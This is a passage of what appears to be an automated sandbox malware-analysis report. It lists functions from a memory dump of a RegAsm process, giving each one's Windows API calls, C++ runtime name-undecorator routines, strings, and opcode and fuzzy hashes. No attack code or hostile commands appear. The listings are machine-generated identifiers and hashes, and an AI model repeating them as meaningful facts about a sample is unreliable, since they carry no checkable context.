                                                                                                                                                                                                                                  • GetLocaleInfoEx.KERNEL32(!x-sys-default-locale,20000001,00000000,00000002,?,?,0041F6CD,?,00000000), ref: 005406D3
                                                                                                                                                                                                                                  • FormatMessageA.KERNEL32(00001300,00000000,?,00000000,0041F6CD,00000000,00000000,?,?,0041F6CD,?,00000000), ref: 005406FA
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000003.00000002.1827502764.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: FormatInfoLocaleMessage
                                                                                                                                                                                                                                  • String ID: !x-sys-default-locale
                                                                                                                                                                                                                                  • API String ID: 4235545615-2729719199
                                                                                                                                                                                                                                  • Opcode ID: 20989b94304a7defb237158a79aa7857ec4fe8fe38480a26bcda83b1aef4dd94
                                                                                                                                                                                                                                  • Instruction ID: 0e6d38edd00be859f6cf78a91d2be4bd9eac5d4685f0f32cae1fa79fc940a6ab
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 20989b94304a7defb237158a79aa7857ec4fe8fe38480a26bcda83b1aef4dd94
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 87F01C75610205FFEB049BD5DD0ADEF7BACEB49794B114015BA42D6180E2B0AE1097B0
                                                                                                                                                                                                                                  Function 005614E4 Relevance: 4.7, APIs: 3, Instructions: 205COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                    • Part of subcall function 0055AF41: GetLastError.KERNEL32(00000000,00553EAB,0055E4B5), ref: 0055AF45
                                                                                                                                                                                                                                    • Part of subcall function 0055AF41: SetLastError.KERNEL32(00000000,00000000,-000A8750,00000006,000000FF), ref: 0055AFE7
                                                                                                                                                                                                                                  • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00561538
                                                                                                                                                                                                                                  • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00561582
                                                                                                                                                                                                                                  • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00561648
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000003.00000002.1827502764.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: InfoLocale$ErrorLast
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 661929714-0
                                                                                                                                                                                                                                  • Opcode ID: 0b6528ed2727af672cad1082899e4a17bddceb69dc66016f5d56a2f29a8f21a4
                                                                                                                                                                                                                                  • Instruction ID: 70c1aa71be4d85ad4eb85358a0efa33ec9ce2a5a9ef07227a9ee6fcf816bf23e
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0b6528ed2727af672cad1082899e4a17bddceb69dc66016f5d56a2f29a8f21a4
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4761AF75900A079FEB289F28CD86BBA7BB8FF04300F184179E906C7681EB34D985CB54
                                                                                                                                                                                                                                  Function 00553C90 Relevance: 4.6, APIs: 3, Instructions: 77COMMONLIBRARYCODE
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • IsDebuggerPresent.KERNEL32(?,?,?,?,?,-000A8750), ref: 00553D88
                                                                                                                                                                                                                                  • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,-000A8750), ref: 00553D92
                                                                                                                                                                                                                                  • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,-000A8750), ref: 00553D9F
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000003.00000002.1827502764.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 3906539128-0
                                                                                                                                                                                                                                  • Opcode ID: 9a018ef6bc7f006d2d5b9871a2d5a14fba6324950fd96809d316f4df3e492099
                                                                                                                                                                                                                                  • Instruction ID: 5739e484f8b64ed1158f2adb511fc395c4ea5408645fc0710bc97b51debf59f2
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9a018ef6bc7f006d2d5b9871a2d5a14fba6324950fd96809d316f4df3e492099
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9131C174901229ABCB21DF68DC887CDBBB8BF08350F5041EAE80CA7290E7709F858F44
                                                                                                                                                                                                                                  Function 00561737 Relevance: 1.6, APIs: 1, Instructions: 83COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                    • Part of subcall function 0055AF41: GetLastError.KERNEL32(00000000,00553EAB,0055E4B5), ref: 0055AF45
                                                                                                                                                                                                                                    • Part of subcall function 0055AF41: SetLastError.KERNEL32(00000000,00000000,-000A8750,00000006,000000FF), ref: 0055AFE7
                                                                                                                                                                                                                                  • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0056178B
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000003.00000002.1827502764.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: ErrorLast$InfoLocale
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 3736152602-0
                                                                                                                                                                                                                                  • Opcode ID: 12314db74dc1c780a7f071075102a6d7ad0d4ebf62ed34c4e0022942b85259d0
                                                                                                                                                                                                                                  • Instruction ID: 525e2d3deaa755b1367135d3ace304a61511168b89152ff51cc4dfa5dad0c6b6
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 12314db74dc1c780a7f071075102a6d7ad0d4ebf62ed34c4e0022942b85259d0
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1C219272600607ABDB289A25DC45A7B7BA8FF44711F14417AFD01D7241EB34ED45C754
                                                                                                                                                                                                                                  Function 005613BE Relevance: 1.6, APIs: 1, Instructions: 63COMMONLIBRARYCODE
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                    • Part of subcall function 0055AF41: GetLastError.KERNEL32(00000000,00553EAB,0055E4B5), ref: 0055AF45
                                                                                                                                                                                                                                    • Part of subcall function 0055AF41: SetLastError.KERNEL32(00000000,00000000,-000A8750,00000006,000000FF), ref: 0055AFE7
                                                                                                                                                                                                                                  • EnumSystemLocalesW.KERNEL32(005614E4,00000001,00000000,?,-00000050,?,00561B18,00000000,?,?,?,00000055,?), ref: 00561430
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000003.00000002.1827502764.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: ErrorLast$EnumLocalesSystem
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 2417226690-0
                                                                                                                                                                                                                                  • Opcode ID: 21ce9017f429e29c507f143db8d43db0c9d3451e451c8b9caf143c15956b3100
                                                                                                                                                                                                                                  • Instruction ID: 180f8680915f0e2750d0feb05cf390752d4532b0f2bdb17f0f286a0e4d458973
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 21ce9017f429e29c507f143db8d43db0c9d3451e451c8b9caf143c15956b3100
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F211253A200B015FDF289F39C8916BABB91FF84359B18442DE98787B40D771B842CB44
                                                                                                                                                                                                                                  Function 00561966 Relevance: 1.5, APIs: 1, Instructions: 48COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                    • Part of subcall function 0055AF41: GetLastError.KERNEL32(00000000,00553EAB,0055E4B5), ref: 0055AF45
                                                                                                                                                                                                                                    • Part of subcall function 0055AF41: SetLastError.KERNEL32(00000000,00000000,-000A8750,00000006,000000FF), ref: 0055AFE7
                                                                                                                                                                                                                                  • GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,005617E1,00000000,00000000,?), ref: 00561992
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000003.00000002.1827502764.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: ErrorLast$InfoLocale
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 3736152602-0
                                                                                                                                                                                                                                  • Opcode ID: e6566e4f1a3b52a8953e7b7c61f10ab0633314299bf4cecfc55e456ca9af0dec
                                                                                                                                                                                                                                  • Instruction ID: 154d179d65967cd39def3a332d30e682769adac159f1085352af7702dae20319
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e6566e4f1a3b52a8953e7b7c61f10ab0633314299bf4cecfc55e456ca9af0dec
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F501DB32A009166BDF18562588157BA3F68FB40395F194469ED46E3180EE74ED41C798
                                                                                                                                                                                                                                  Function 005612CC Relevance: 1.5, APIs: 1, Instructions: 43COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                    • Part of subcall function 0055AF41: GetLastError.KERNEL32(00000000,00553EAB,0055E4B5), ref: 0055AF45
                                                                                                                                                                                                                                    • Part of subcall function 0055AF41: SetLastError.KERNEL32(00000000,00000000,-000A8750,00000006,000000FF), ref: 0055AFE7
                                                                                                                                                                                                                                  • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,-00000050,00000000,000000D0), ref: 00561320
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000003.00000002.1827502764.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: ErrorLast$InfoLocale
                                                                                                                                                                                                                                  • String ID: utf8
                                                                                                                                                                                                                                  • API String ID: 3736152602-905460609
                                                                                                                                                                                                                                  • Opcode ID: 1e0f790edf6219d0087bedd49c03608ce0d3e650134530e563ebd2cc61586877
                                                                                                                                                                                                                                  • Instruction ID: aee0512e19c8a49db782e0b08c784dc8b685f258d65ca6f674f0ee33791576ef
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1e0f790edf6219d0087bedd49c03608ce0d3e650134530e563ebd2cc61586877
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C6F0C832700206ABD714AB74DC49ABA37ECFF85315F1501BAF906EB241EA74AD049754
                                                                                                                                                                                                                                  Function 00561459 Relevance: 1.5, APIs: 1, Instructions: 41COMMONLIBRARYCODE
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                    • Part of subcall function 0055AF41: GetLastError.KERNEL32(00000000,00553EAB,0055E4B5), ref: 0055AF45
                                                                                                                                                                                                                                    • Part of subcall function 0055AF41: SetLastError.KERNEL32(00000000,00000000,-000A8750,00000006,000000FF), ref: 0055AFE7
                                                                                                                                                                                                                                  • EnumSystemLocalesW.KERNEL32(00561737,00000001,?,?,-00000050,?,00561AE0,-00000050,?,?,?,00000055,?,-00000050,?,?), ref: 005614A3
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000003.00000002.1827502764.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: ErrorLast$EnumLocalesSystem
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 2417226690-0
                                                                                                                                                                                                                                  • Opcode ID: 741fb869a1053948aadea0cbad9fff4b362ef6a6ed194ecfcb899d0c432c9017
                                                                                                                                                                                                                                  • Instruction ID: 60fae8a6d0401c9fe4353c39c12cf03f1eaf9966b8dd418d38ee2b8e43ff756d
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 741fb869a1053948aadea0cbad9fff4b362ef6a6ed194ecfcb899d0c432c9017
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3EF046362007055FCB149F39DC81B7A7F94FF80328B08842DF9454B680CAB2AC02CA54
                                                                                                                                                                                                                                  Function 0055B578 Relevance: 1.5, APIs: 1, Instructions: 33COMMONLIBRARYCODE
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                    • Part of subcall function 00559A51: EnterCriticalSection.KERNEL32(-00173DB0,?,00555902,00000000,005898B0,0000000C,005558CA,?,?,0055D10C,?,?,0055B0E2,00000001,00000364,0041C3C8), ref: 00559A60
                                                                                                                                                                                                                                  • EnumSystemLocalesW.KERNEL32(0055B56B,00000001,00589B70,0000000C,0055B943,00000000), ref: 0055B5B0
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000003.00000002.1827502764.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: CriticalEnterEnumLocalesSectionSystem
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 1272433827-0
                                                                                                                                                                                                                                  • Opcode ID: 298a0d326feddef51fa4531c83a59b35b28190c683d77284d9966ad9bc3db6ad
                                                                                                                                                                                                                                  • Instruction ID: a1966b68aeed02658dd9d22d9ee8b81625bd5ca2e6ebc5b528a783e4692361ab
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 298a0d326feddef51fa4531c83a59b35b28190c683d77284d9966ad9bc3db6ad
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: FFF03C76A40205DFD704DF58E85AB5D7BA0FB54721F10411BE811A72A0DB758909DF40
                                                                                                                                                                                                                                  Function 00561373 Relevance: 1.5, APIs: 1, Instructions: 31COMMONLIBRARYCODE
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                    • Part of subcall function 0055AF41: GetLastError.KERNEL32(00000000,00553EAB,0055E4B5), ref: 0055AF45
                                                                                                                                                                                                                                    • Part of subcall function 0055AF41: SetLastError.KERNEL32(00000000,00000000,-000A8750,00000006,000000FF), ref: 0055AFE7
                                                                                                                                                                                                                                  • EnumSystemLocalesW.KERNEL32(005612CC,00000001,?,?,?,00561B3A,-00000050,?,?,?,00000055,?,-00000050,?,?,00000004), ref: 005613AA
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000003.00000002.1827502764.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: ErrorLast$EnumLocalesSystem
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 2417226690-0
                                                                                                                                                                                                                                  • Opcode ID: 60dce63610ef3a150b1960c8f744771e6eb579848d3b35c668cd4f5e1924079e
                                                                                                                                                                                                                                  • Instruction ID: 6fbf1db0d860dfe5b69b60246790b1693fd5e35598fd401bb204bb28dcf0b992
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 60dce63610ef3a150b1960c8f744771e6eb579848d3b35c668cd4f5e1924079e
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 91F0E53A30024557CB049F39D85567A7F94FFC1710B0A4459EE06CB651D6719842C794
                                                                                                                                                                                                                                  Function 0055BA47 Relevance: 1.5, APIs: 1, Instructions: 24COMMONLIBRARYCODE
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetLocaleInfoW.KERNEL32(00000000,?,00000000,?,-00000050,?,?,?,005579FC,?,20001004,00000000,00000002,?,?,00556FEE), ref: 0055BA7B
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000003.00000002.1827502764.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: InfoLocale
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 2299586839-0
                                                                                                                                                                                                                                  • Opcode ID: bb9429e0232fbbff0e4e3be30dc214aa290e8663941acf9757ef2ff556115542
                                                                                                                                                                                                                                  • Instruction ID: c060f1b78f71f7eb78c69f107a62cdac8244513631f35d7fac48146e687034f2
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: bb9429e0232fbbff0e4e3be30dc214aa290e8663941acf9757ef2ff556115542
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1EE04F35900219BBDF126F60DC1DEAE3F16FF44761F104512FC4566221CB729925AA95
                                                                                                                                                                                                                                  Function 0051CD90 Relevance: 1.5, APIs: 1, Instructions: 15encryptionCOMMONLIBRARYCODE
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • CryptReleaseContext.ADVAPI32(?,00000000,?,?,0051CE6B,?,?,0051D0F9,?,?,00000000), ref: 0051CDA7
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000003.00000002.1827502764.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: ContextCryptRelease
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 829835001-0
                                                                                                                                                                                                                                  • Opcode ID: f99aaac8c9758899443b23d47bd2e6f87f5fee543218b0c6a20bca957a8c697e
                                                                                                                                                                                                                                  • Instruction ID: 2a2373d077735e32addf59d9ae9e58c9926abfff3bf8d2f6bc61f1b82ef8659c
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: f99aaac8c9758899443b23d47bd2e6f87f5fee543218b0c6a20bca957a8c697e
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 78D05E70544208EBC704CB88E844B69BBB9EB45300F100198E80457350C7725E00EA90
                                                                                                                                                                                                                                  Function 0042C650 Relevance: 1.5, APIs: 1, Instructions: 13timeCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetSystemTimeAsFileTime.KERNEL32(?), ref: 0042C65A
                                                                                                                                                                                                                                    • Part of subcall function 0042C630: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0042C645
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000003.00000002.1827502764.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Time$FileSystemUnothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 1518329722-0
                                                                                                                                                                                                                                  • Opcode ID: 0846384a7ef8ada146f4364a39d2aa150d6fe90e0a2e0f76f70be87aba7eb902
                                                                                                                                                                                                                                  • Instruction ID: 26212f6dd9c9889740eace36348083d601d478463fc9ebf136614ef56493588f
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0846384a7ef8ada146f4364a39d2aa150d6fe90e0a2e0f76f70be87aba7eb902
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0DC012B5C1010CA78E00EBE4BC4A89DBB2C9610115F4006A5ED0983101F935A25D8BD2
                                                                                                                                                                                                                                  Function 0042DCD0 Relevance: .0, Instructions: 22COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000003.00000002.1827502764.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: 1a58165032b6f387b3a28474570795e4e25dfc93a0902fae1b5fa62accefb4b4
                                                                                                                                                                                                                                  • Instruction ID: cd77543b30515fead899721cfa5598f148643e701e7b6ea9acc9c050cb6a9405
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1a58165032b6f387b3a28474570795e4e25dfc93a0902fae1b5fa62accefb4b4
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 00E06D74901608EFDB10DFA4E8087A9BBB4FB58301F505A5BEC0493391D3389988EB80
                                                                                                                                                                                                                                  Function 00545A72 Relevance: 72.1, APIs: 11, Strings: 30, Instructions: 359COMMONLIBRARYCODE
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000003.00000002.1827502764.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: shared_ptr$operator+$Name::operator+Name::operator=
                                                                                                                                                                                                                                  • String ID: volatile$<unknown>$UNKNOWN$__int128$__int16$__int32$__int64$__int8$__w64 $auto$bool$char$char16_t$char32_t$char8_t$const$decltype(auto)$double$dV$float$int$long$long $short$signed $this $unsigned $void$volatile$wchar_t
                                                                                                                                                                                                                                  • API String ID: 1464150960-1494216725
                                                                                                                                                                                                                                  • Opcode ID: ac75876a071b2d59c407c2330918ee95437065eec806d2a68f1ef975a5941908
                                                                                                                                                                                                                                  • Instruction ID: 6d99804e3a8da7d5ea7344fbbeede2e4870af29eb28eb8129b335d5c7abf15d8
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ac75876a071b2d59c407c2330918ee95437065eec806d2a68f1ef975a5941908
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F2E139B5C0460ADBCB14DF94C49DAFEBFB8BB04308F20855AE512A7242E7B55B49CF91
                                                                                                                                                                                                                                  Function 00549354 Relevance: 28.3, APIs: 10, Strings: 6, Instructions: 297COMMONLIBRARYCODE
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • DName::operator+.LIBCMT ref: 0054942A
                                                                                                                                                                                                                                  • UnDecorator::getSignedDimension.LIBCMT ref: 00549435
                                                                                                                                                                                                                                  • UnDecorator::getSignedDimension.LIBCMT ref: 00549521
                                                                                                                                                                                                                                  • UnDecorator::getSignedDimension.LIBCMT ref: 0054953E
                                                                                                                                                                                                                                  • UnDecorator::getSignedDimension.LIBCMT ref: 0054955B
                                                                                                                                                                                                                                  • DName::operator+.LIBCMT ref: 00549570
                                                                                                                                                                                                                                  • UnDecorator::getSignedDimension.LIBCMT ref: 0054958A
                                                                                                                                                                                                                                  • _swprintf.LIBCMTD ref: 00549604
                                                                                                                                                                                                                                  • DName::operator+.LIBCMT ref: 0054965F
                                                                                                                                                                                                                                    • Part of subcall function 00545497: DName::DName.LIBVCRUNTIME ref: 005454F5
                                                                                                                                                                                                                                  • DName::DName.LIBVCRUNTIME ref: 005496D6
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000003.00000002.1827502764.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Decorator::getDimensionSigned$Name::operator+$NameName::$_swprintf
                                                                                                                                                                                                                                  • String ID: NULL$`generic-class-parameter-$`generic-method-parameter-$`template-type-parameter-$lambda$nullptr
                                                                                                                                                                                                                                  • API String ID: 138750261-2441609178
                                                                                                                                                                                                                                  • Opcode ID: 8a1952b18291c6209458bb4a13aa854f6d774381a99a8f7d3ed765806125377e
                                                                                                                                                                                                                                  • Instruction ID: 79b858ad9252b6762193080c1aa84ee5613355ddb00d8d47f0802fe59c1a2d6a
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8a1952b18291c6209458bb4a13aa854f6d774381a99a8f7d3ed765806125377e
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: DC91A5B2D0410A9ACF14EFB4D95FAFF7F78BF9530CF200919E112A6186DA749A058B61
                                                                                                                                                                                                                                  Function 0054885E Relevance: 24.8, APIs: 13, Strings: 1, Instructions: 305COMMONLIBRARYCODE
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • DName::operator+.LIBCMT ref: 005488C9
                                                                                                                                                                                                                                  • DName::operator+.LIBCMT ref: 00548A0C
                                                                                                                                                                                                                                    • Part of subcall function 005444DA: shared_ptr.LIBCMT ref: 005444F6
                                                                                                                                                                                                                                  • DName::operator+.LIBCMT ref: 005489B7
                                                                                                                                                                                                                                  • DName::operator+.LIBCMT ref: 00548A58
                                                                                                                                                                                                                                  • DName::operator+.LIBCMT ref: 00548A67
                                                                                                                                                                                                                                  • DName::operator+.LIBCMT ref: 00548B93
                                                                                                                                                                                                                                  • DName::operator=.LIBVCRUNTIME ref: 00548BD3
                                                                                                                                                                                                                                  • DName::DName.LIBVCRUNTIME ref: 00548BDD
                                                                                                                                                                                                                                  • DName::operator+.LIBCMT ref: 00548BFA
                                                                                                                                                                                                                                  • DName::operator+.LIBCMT ref: 00548C06
                                                                                                                                                                                                                                    • Part of subcall function 0054A0F8: Replicator::operator[].LIBCMT ref: 0054A135
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000003.00000002.1827502764.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Name::operator+$NameName::Name::operator=Replicator::operator[]shared_ptr
                                                                                                                                                                                                                                  • String ID: `anonymous namespace'
                                                                                                                                                                                                                                  • API String ID: 1043660730-3062148218
                                                                                                                                                                                                                                  • Opcode ID: f0e404364c21831623b221b52700c3fa0ced215c7f50163083520117cbc2fdd5
                                                                                                                                                                                                                                  • Instruction ID: a56167a98a905c46dd22504de9dbf9ed21a87d1f1268e930c8451ea431c80cbe
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: f0e404364c21831623b221b52700c3fa0ced215c7f50163083520117cbc2fdd5
